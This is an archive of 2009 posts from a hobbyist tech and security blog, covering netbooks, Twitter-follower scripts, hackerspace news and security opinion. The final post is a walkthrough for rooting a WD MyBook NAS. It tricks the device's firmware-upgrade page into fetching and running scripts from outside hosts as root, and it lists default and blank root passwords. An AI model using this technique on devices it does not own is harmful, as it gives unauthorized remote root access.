So you've probably read it everywhere by now: Google's Safebrowsing API got a case of the hiccups and started marking the entire Internet as harmful. Ryan Naraine was all over this like a monkey on a football this morning, and his post on Zero Day was the first report I saw of it.
As for me, though? I was sitting smug, not worrying too much. Others may have feared that their computer or browser had been compromised. I was pretty sure (okay, after a few test searches and hitting some of my own sites) that it wasn't a problem on my end, or a problem with the web content on most sites, either.
<fanboy><smug>
I'm running FireFox 3 with NoScript (and now RequestPolicy) on top of OpenBSD. What could I possibly browse that would harm my computer?
</smug></fanboy>
And yes, I am aware that there are still things out there that could probably do something bad somehow, but the odds are pretty slim.
2009-01-31
Smugness in the face of malware
Labels: InfoSec, news, web browser
2009-01-27
Fake Hacking: You're doing it wrong
As seen on Fringe this evening. That's supposed to be an IP Address.
At least they could have used an RFC 1918 Non-Routable Address.
2009-01-25
Netbooks as signposts on an evolutionary road
I've been "into" small mobile computers for years. I didn't know it at the time, but I've spent quite a long time trying to junk-build my own netbook. I've played with old Mac Powerbook Duos, old Compaq Contura Aeros, HP LX-series DOS and GEOS palmtops, TI-92, Epson EHT x86 handhelds, etc. All of them lacked one or more of the "essential" features of a modern netbook - a commodity CPU/chipset to run a generic OS, built-in or otherwise easily available WiFi, a reasonable (modern) screen resolution, a usable keyboard. So, when ASUS announced the Eee PC I knew right away that it was the basic design I had been wanting for a very long time, coupled with a reasonable price point. This price vs size point has been discussed for the last year and a half or so in other sources. One thing I haven't really seen much of is the analysis of the evolution of mobile computing. I'm no pundit, I'm just some geek that's finally been accommodated by the industry with a product I actually want.
For the last 30 years portable machines have been whittled to a few size constraints that are only possible to bypass by re-engineering the fundamental design of the portable computer. Look at every mobile device out today and you see that they are fundamentally limited in size generally by only 1) the size of the display, 2) the size of the keyboard (or other input device), and/or 3) the size of the battery pack/power supply.
Analysis of my Acer Aspire One leads to these points: The thickest part of the case is the rear hinge that houses the battery pack. The widest part of the case is only marginally wider than the keyboard. The depth of the case is only marginally deeper than the keyboard and touchpad combo and also the screen and webcam combo, both stacked in front of the the battery pack. The only way to shrink the AA1 is to shrink any one or more of the three limits I listed above.
Sony managed get around part of this in the Vaio P by using a nub pointer instead of a touch pad (note: Wired did an analysis on if the Vaio P is a "netbook"and glossed right over the touchpad issue). That has the tradeoff of taking away the ability to use multitouch features, at least until they include a touch screen, but they re-engineered the basic design.
Many netbooks could see small size cuts by being built with LiPoly batteries that are built into the cases. How much space could be trimmed on the rear of the standard netbook if a large flat sheet of LiPoly was built behind the screen? The screen half would get marginally thicker but the main body could be slimmed quite a bit. That would trim space on two dimensions in one go, but would trade off the consumer removable battery. To keep that it might be just as easy to put the LiPoly in the space under the keyboard by shrinking the mobo designs and filling otherwise empty space with custom LiPoly packs. Part of shrinking the mobo design is reducing the cooling demands that need a fan and shroud stacked on top of the CPU & chipset.
VIA failed on usability with it's Nanobook design, and thus so has the Everex Cloudbook and all the rebrands of the design. They sacrificed screen size to place the touch pad right next to the display. That design failed in the early 90's when builders tried putting trackballs and buttons on the screen half of laptops. The Packard Bell Easynote design has a ridiculously tiny touchpad in front of the keyboard. All of this is simply trying to engineer around putting in a full touch screen while also trying to mitigate the size of the device mandated by the design of stacking up the keyboard and touchpad. The next logical step to shrink a netbook is to either pull a Sony and use a nub or go for a full touchscreen.
The single largest component on a netbook is the keyboard and already they are smaller than the average laptop keyboard, which are in turn smaller than a desktop keyboard. Sony has already hit the keyboard limit on the Vaio P, and I see that as being the main obstacle to the size of netbooks in the foreseeable future.
The next logical designs of netbooks will see touchscreens *and* nub pointers, along with Apple style integrated batteries, and super-wide screens matching the size of the keyboard. The human limit of usability is the input device, which can not shrink much before it truly hinders usability. The keyboard is the single component of a netbook around which all other design points will match. Every goofy design that has been tried has failed thus far. The lasting design of the past few decades is the clamshell notebook and it's evolution has lead to two roads - a maximal size limit dictated by the screen size (desktop replacements), and a minimal size limit dictated by the keyboard size (netbooks).
Back-typing keyboards, thumb boards, and even virtual touch screen keyboards suffer from faults that just cannot be engineered around. The back typing keyboard puts a huge limit on using hte device on a table/desk and also hitting a specific key, as it requires a complete touch typing knowledge of the keyboard - absolutely no hunt and pecking. Back typing will totally fail in the mass market. Totally and utterly fail. Thumb boards are ok for limited use, a la SMS and on-the-go email and ebook reader devices but pose serious functional limits for a netbook/notebook device. The next gen OLPC 2 design is to use a virtual touch screen keyboard. They have serious engineering work ahead of them if they want to make it as usable as a normal keyboard. RIM already took a step with the Storm and it's clicking screen, but it still lacks actual tactile feedback of the fingers on each individual button.
So, in my final ramblings, I see the "netbook" as trending to one major design if it is to be a separate class than a notebook. That design is a small mobo and LiPoly battery under the keyboard and a display that matches the physical size of the keyboard, with a touchscreen and most likely also a nub pointer. The standard notebook design of large palm rests and a touchpad do not fit in with the ultra small/mobile/portable/pocketable design of the netbook. Many of these design changes come with costs to manufacture. Current battery designs are cheap because they use cheap cell packs. Once netbooks settle around keyboard sized designs a fairly common battery pack will emerge, much like the hinge pack design that is current.
2009-01-21
"Secret" messages with Pilot Frixion
Never mind the double-entendre; Frixion is not a sex toy. It's the next generation of eraseable ink pens. I honestly thought this finally went the way of the dodo in the 1990s. Who of us twenty-and-thirty-somethings can forget those old EraserMate Pens that would smudge and leave our pinkies and wrists blue?
Well, Pilot went about it a different way. The packaging (and website) says this is a thermo-sensitive ink and that the heat generated by the "eraser" (actually a soft plastic or hard rubber nub that doesn't really rub off on the paper) is enough to make the ink disappear so that you can correct the mistakes you make.
My wife bought me one to play with because I like quirky pens. Don't ask. It writes just like a typical gel pen.
Sure enough, the hard "eraser" does work, and apparently quite well.
As you can see, all traces are gone. Holding it up to the light, this looks like a blank sheet out of my notebook. Holding it at an angle to the light, there are faint marks of the ink, but it's not legible. The marks could be passed off as impression from the page above it.
I decided to try an experiment with the temperature sensitive ink, and only seconds after being exposed to the cold air in my freezer, the ink started to reappear. It did get a little darker after a few minutes. I'm wondering if heat that didn't involve friction (a toaster oven, candle, clothes iron or steam) would result in a more legible message. Maybe I'll try that next.
There you have it. A completely innocuous method of passing messages that uses nothing suspicious whatsoever. Just a pen you bought at the drug store, and a burst of cold air to make it legible again.
2009-01-18
newLISP: Twitter Followers/Friends/Common
Here's what I came up with. It does the following:
- Builds the HTTP Basic Auth header
- Fetches all your followers (100 at a time until no more are found)
- Fetches all your friends (again, 100 at a time)
- Looks for each of your followers in your friends list
- Prints each follower that you haven't marked as a friend
- Adds commons (friends who follow you back) to a list
- Prints each friend that's not following you
- Prints the list of commons
#!/usr/bin/newlisp
# Build an HTTP Basic Auth header for get-url.
# Set 'user and 'pass manually
(set 'user "YourTwitterName" 'pass "NotMyPasswd")
(set 'hedr (append "Authorization: Basic "
(base64-enc (append user ":" pass)) "\r\n\r\n"))
# Grabs followers until results list has less than 100
(set 'page 0) (do-until (< numthese 100) (inc page)
(set 'xml (get-url (append
"http://twitter.com/statuses/followers.xml?page="(string page))
5000 hedr))
(set 'these (find-all "<screen_name>(.*)</screen_name>" xml $1))
(cond ((= page 1) (set 'fol these))
((> page 1) (set 'fol (append fol these))))
(set 'numthese (length these))
)
# Grabs friends until results list has less than 100
(set 'page 0) (do-until (< numthese 100) (inc page)
(set 'xml (get-url (append
"http://twitter.com/statuses/friends.xml?page="(string page))
5000 hedr))
(set 'these (find-all "<screen_name>(.*)</screen_name>" xml $1))
(cond ((= page 1) (set 'fri these))
((> page 1) (set 'fri (append fri these))))
(set 'numthese (length these)))
# Iterate followers against friends list
(dolist (follower fol)
(if (nil? (find follower fri))
(print (append follower " is not a friend\r\n"))
# If follower and friend, push to com list
(if (nil? com) (set 'com (list follower))
(push follower com))))
# Iterate friends against followers list
(dolist (friend fri)
(if (nil? (find friend fol))
(print (append friend " is not following\r\n")) (inc notfol)))
# Print list of common (friend & follow)
(dolist (common com)
(print (append common " is following back.\r\n")))
(exit)
Why'd I do this? Why not use Twitter Karma or some other online tool?
- I didn't want to enter my username and password into someone else's web app.
- I wanted a quick programming project that could take up part of my weekend.
- It was fun.
Labels: newlisp, programming, twitter
2009-01-16
Twitter Followers/Friends from the CLI
- Who am I following that's not following me back? (i.e. can Martin Roesch hear me? The answer is no, he can't)
- Who is following me that I'm not following back?
If you have 203 followers, you will have to do three requests for follower info. Same with friends (those whom you follow). I had over 200 (but less than 300) each. So I did 3 of each request.
I'm only interested in the screen_name attribute within the XML of each. Note that I'm doing a lot of cheap grep | awk crap here, so it just builds lists of screen names without any markup.
| grep "<screen_name>" | awk -F"[\<\>]" '{print $3}' > friends.txt
| grep "<screen_name>" | awk -F"[\<\>]" '{print $3}' >> friends.txt
| grep "<screen_name>" | awk -F"[\<\>]" '{print $3}' >> friends.txt
Then, I just sorted them:
$ sort friends.txt > friends-sort.txt
$ sort followers.txt > followers-sort.txt
Using diff, it's easy to tell who is not following you, and who you aren't following.
The < shows lines that only appear only in the first file (ones you follow only). The > shows lines that only appear only in the second file (ones following you). Grepping for only lines that start with < and > avoids all the patch-file line offset stuff. Some diffs have varying syntax to do this, but letting grep filter it should work across more platforms.
$ diff friends.txt followers.txt | grep "[<>]" | sort
[excerpt]
< H_i_R
< Hak5
< KCWeather
< Scobleizer
< Veronica
< bacontwits
< beseKUre
< brightkite
< datalossdb
< hackadaydotcom
< ihacked
< ihackstuff
< kingpin_
< milw0rm
< mroesch
< obsessable
< om
< packetlife
< pauldotcom
< schneier
< textfiles
< wilw
< window
------------------ (split added by ax0n)
> BlackHatUSA
> Computersaurus
> HacClearwater
> HackersAlerts
> HackerspacesBot
> SOURCEBoston
> SecuritySatan
> quine
> reverz
> rsreese
> secureideas
> securitypro2009
> stopthemanga
Labels: awk, programming, shell, twitter
February 13th - The end of the universe as we know it?
First off, February 13th is my wife's birthday. Yes, the day before Valentine's day. No, I can't just get her one big gift for both at the same time. That landed me in the dog-house in 1998. I won't try that again.
But further, on the Cowtown Computer Congress of KC mailing list, someone pointed out that there's an exciting event in epoch time happening that day. For exactly one second, the epoch clock will read 1,234,567,890 seconds past midnight, Jan 1, 1970.
Fri Feb 13 17:31:30 2009
So, the epoch (epic?) clock will tick 1234567890 on a Friday The Thirteenth. Apocalypse? Insanity? You be the judge.
2009-01-15
Bad Security is like Bad Coffee
A few days after getting hired for my current position, I poured a cup of the office-brewed coffee that looked like tea. "Who would brew such weak coffee!?" I pondered. I checked the basket and filter to see how much coffee had been used. The basket was empty. This tea-like substance was the result of hot water washing crusted, ages-old coffee residue from the basket into the carafe. I gagged upon seeing this, and have never tried the coffee at work again.
2009-01-14
You might be a nerd if... [Humor]
xkcd impersonates life.
I haven't been subjected to this exact same scenario, but I have had a few times where I've needed to get my wife's attention remotely to let her know she needs to answer the phone. The Lab-O-Ratory is a noisy place, what with the rack-mount servers whirring away and all. If her phone is left on vibrate mode or is in another room, it's hard to hear it. Usually, she'd be logged into WOW or otherwise online, but not logged into AIM or GTalk, not checking her e-mail.
# while true; do echo ^G > /dev/ttyC0; done
2009-01-13
Reply All: Just don't do it.
According to Associated Press, a ginormous Reply-All storm nearly hosed the State Department's e-mail system:
WASHINGTON – Many "reply all" fiascos result in mere embarrassment, but American diplomats have been told they may be punished for sending mass responses after an e-mail storm nearly knocked out one of the State Department's main electronic communications systems.
2009-01-11
Windows 7 beta
So, I'll start this easy. I nabbed my copy of Windows 7 beta and managed to get it installed on my Acer Aspire One A150 (ie, the HDD-based series). First impressions lead me to think that this runs like XP already does (fairly well) even though it's got the Vista base. Over all I feel the same about it that some other people have posted: it's what Vista should have been. Rough edges cleaned up, awkward security model loosened up, and much faster. The one real feature I like? The stock icons in the taskbar are mono. They're easy to see and identify, just like the ones in the menu bar on, uh, OS X. Yeah, except MS made these white with a black outline, and they're on the bottom of the screen so you see, they're not the same...
One for the Role Playing Gamers
Both Frogman and (jeff)isageek shared these RPG Motivational Posters on Geekdad via Google Reader today. This one is my favorite.
2009-01-09
A call to arms: War on removable media!
According to some, 2TB SDXC memory cards will be directly responsible for data loss in the future:
Even though I am an optimist, it is hard not to see bigger (literally) breaches ahead - unless we get our act together. Time to make these cards more secure - can we get some security standards also into the new SDXC standards?While we're blaming things:
- Forks cause obesity
- Guns cause murder
- Matches cause arson
Let's think rationally for a while, and take a look at the numbers: stolen or misplaced removable media is to blame for a scant 3% of reported data loss incidents.
Data loss and breach are largely human problems. If Jim is disgruntled and wants to take the entirety of his corporation's Intellectual Property with him to his new gig, the latest, whiz-bang SDXC card won't necessarily be the break he's been waiting for, and increased capacity won't likely lead to many to bigger accidental breaches since this type of incident is responsible for such a minuscule fraction of them in the first place. It might, however, increase bandwidth abuse at work, since people can finally torrent the entirety of the Dr. Who saga and fit it all onto a cute little card that fits in their pocket.
2009-01-08
Cowtown Computer Congress - The Underground Lab!
Jur1st at CCCKC announced some HUGE news at the meeting tonight:
I am thrilled to announce that CCCKC has come to an agreement in principal to lease a 1400 square foot facility located deep within the limestone hills of Kansas City. Don’t be fooled by the above ground access…the lab lurks 85 feet below the surface of the earth. What started as a few guys kicking the idea around over some pints at the Flying Saucer has become one of the most inspiring and diverse groups of hackers, tinkerers, makers and enthusiasts in the country.
There was a huge turnout for the huge news, too! At least 22 people (captured in a craptastic panoramic photo by myself with the help of some other attendees)
There's other news as well. The 2009 pricing structure was voted on, and there are hefty discounts for going all-in with a year-long membership. Some upcoming community, training, and fundraising events are also coming soon (as in this week!) Keep an eye on the CCCKC Blog to stay in the loop.
Labels: kansascity, meetings
Cowtown Computer Congress Update [Kansas City]
CCCKC has some exciting news and things going on. There's a meeting tonight that's pretty important. If you haven't been around lately, now's the time to start coming again. They're getting ready to make the jump to a dedicated hackerspace in the underground, mysterious caves of Kansas City.
This is, quite frankly, epic. The plan for a unified hackerspace in Kansas City is barely a year old. This is moving really, really fast compared to other cities.
We also need some existing organizations (technology trainers, user groups, etc) to affiliate with CCCKC. The more members and groups we can get using the space, the better.
Until we actually sign the lease, we're still meeting at JavaNaut on 39th St. - The main meeting starts at 7:00 PM. The board meeting is at 6:00, and if you've offered to help with the build-out in any way, you should probably plan on showing up for the board meeting this evening.
Labels: kansascity, meetings
Chief InfoSec Officer Kitteh [Humor]
ICHC via Guerilla-CISO
If you can't tell, I'm happy I found Guerilla CISO.
2009-01-06
Parallels between the Titanic and IT Security
Unbelievably awesome stuff by Guerilla CISO via Anton Chuvakin:
...the problem here was that the Titanic indeed did meet all of the safety requirements of the time. And that a big part of the problem was that the safety requirements were drafted in 1894 at a time when there were rapid changes and in the size and design of ships of this kind [...] the bottom-line was that when the Titanic was reviewed by the safety accountants, they took out their check-list and went over the ship with a fine tooth comb. When the day was done the ship fully met all the safety criteria and was certified as safe.
This is where I see the parallels between root causes of the Titanic disaster and the odd situation we find ourselves in today in terms of IT security. Security by checklist –especially out of date checklists—simply doesn’t work. Moreover, the entire mental framework that mixes up accounting practices and thoughts with security discipline and research is an utter failure. Audits only uncover the most egregious security failures.
Compliance is a double-edged sword. For many security teams, especially those who work in an organization without a CISO or CSO to help cut through red tape, actual enforcement of policy is hard to do. Many of us aren't given any "teeth" so we're restricted to a bunch of hand waving and hollering and tantrum-throwing whilst being unable to actually make things more secure. Compliance can be used to acquire funding and hopefully get some traction on enterprise security initiatives. Security needs more than compliance, though. This is a great (but overtly dramatic) example of that.
Labels: audit, compliance, InfoSec
MacRumorsLive Hacked?
Click for high-res:
Yesterday, it was Twitter's admin tools (potentially by Digital Gangster members according to PC World) and today, MacRumors' to-the-second outlet for live events, MacRumorsLive.com bites the dust. 4Chan's /g/ board is mentioned but it's unclear if they have anything to do with the attack directly. Both MacRumors and Live are currently down (in a redirect loop) as of writing.
[Hat-Tip: Dangerboy]
2009-01-03
Darwinian Bicycle Security
I ended up riding my bicycle to the 2600 meeting last night. I have to park it pretty much in plain sight in a high-traffic area, so I usually lock it up pretty well there. You can't see it, but it's locked to a natural gas pipe that vanishes into the brickwork.
The blue Trek 800 mountain bike parked next to my own bike wasn't locked in any way. It was simply leaning against the wall. This is a classic case of low-hanging fruit. A thief of opportunity looking for some quick and easy loot could have easily jacked the mountain bike (Approx. retail value brand new: $350) even though my bike would have been worth more (Approx. retail value brand new: $1000) - Chances are, a professional bike thief would have been able to get my bike in under a minute, and would have no qualms doing so.
Many things work this way. Even 64-bit WEP will probably protect your dinky home wireless just fine if five of your neighbors have wide-open wireless. Only the curious or the dedicated might actually try to crack your WEP key. People looking only for free WiFi won't waste time breaking yours if they can find what they want somewhere nearby.
On the topic of the 2600 meeting, we had a great turn-out last night with a few old-schoolers I first met at 2600 in the mid-90's. I haven't seen them face to face in quite a while. Rixon showed off his Kenwood TH-D7-powered APRS Rig, we discussed the finer points of financial and environmental apocalypse, business plans to capitalize on said apocalypse, gawked at Frogman's new Acer Aspire One and caught up on old times. Talk about a great way to kick off 2009!
Labels: InfoSec, kansascity, meetings, physicalsecurity
2009-01-02
Asmodian's Work Bench: Hacking The WD MyBook NAS Drive
The Project
The WD World Book II is a network attached storage device meant for a typical home or professional user. It varies in storage capacity. At the time of writing the sizes vary between 250GB and 2TB. The device itself is the size of an external USB hard-drive, the larger capacities being wider than the base end models. Inside there is a controller board connected to one or two 3.5 inch hard drives. The Controller is running an ARM processor on 32 mb of ram.
The group at mybookworld.wikidot.com collected some scripts to trick the upgrade feature on the drives web interface to run arbitrary commands as root.
Out of the box, the underlying OS is not available. The goal of this project is to enable the ssh server and/or telnet.
The Process
Side notes on recent firmware revisions. Recent revisions will display an error message, the payload will have still have been run though.
- Login to the world book web interface. (the default login is admin : 123456)
- Make a user with the web interface
- Type the following into your browser : http://(DEVICE IP)/auth/firmware_upgrade.pl?fwserver=martin.hinner.info/mybook/firmware.php or http://(DEVICE IP)/auth/firmware_upgrade.pl?fwserver=mybook1.110mb.com/firmware.php
- You will now see a screen telling you that there is a new firmware release available. Click on the "Download and install" button.
- The process will take about 5 minutes or less. Then login via ssh as the user you made on step two then su to the root user with a blank password. If you use the alternate firmware site the password is 'root'
- Type in http://(DEVICE IP)/auth/firmware_upgrade.pl?fwserver=www.geekoh.com/mybook/telnet
- Telnet to the device and login as your user. Then su to root with the password being root or "" depending on which scripts you ran.
There is more than enough storage space to work with so there isn't any reason you couldn't run a full LAMP environment off of it along with whatever services you want.
Resources:
The Hacks:
mybookworld.wikidot.com. "hacks and howto" Accessed January, 2009.
Hinner, Martin. "Hacking Western Digital MyBook World Edition" (September 14, 2008) Accessed January, 2009.
Physical Repair:
Pascucci, Mario. "How to Revive Western Digital Mybook World Edition" (July 25, 2007) Accessed January, 2009.
The Device:
Western Digital Corp. "My Book® World Edition™ II" Accessed January, 2009.
Related HiR Articles:
Ax0n. "La fonera lab: Fon unbricking howto", (October 10, 2008) Accessed January, 2009.
Ax0n. "Jasagar Lives Muahahaha" (October 9,2008) Accessed January, 2009.